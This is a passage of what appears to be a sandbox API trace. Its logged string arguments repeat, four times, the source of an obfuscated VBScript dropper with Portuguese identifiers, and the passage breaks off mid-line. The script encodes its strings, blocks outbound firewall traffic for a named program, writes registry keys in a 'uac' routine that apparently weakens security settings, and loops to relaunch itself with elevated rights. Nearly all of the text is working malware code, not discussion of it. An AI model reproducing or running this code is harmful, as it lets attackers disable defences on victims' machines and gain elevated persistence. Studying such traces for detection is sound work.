then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.996] wcsncmp (_String1="rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.996] wcsncmp (_String1="ules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.996] wcsncmp (_String1="les = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.996] wcsncmp (_String1="es = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 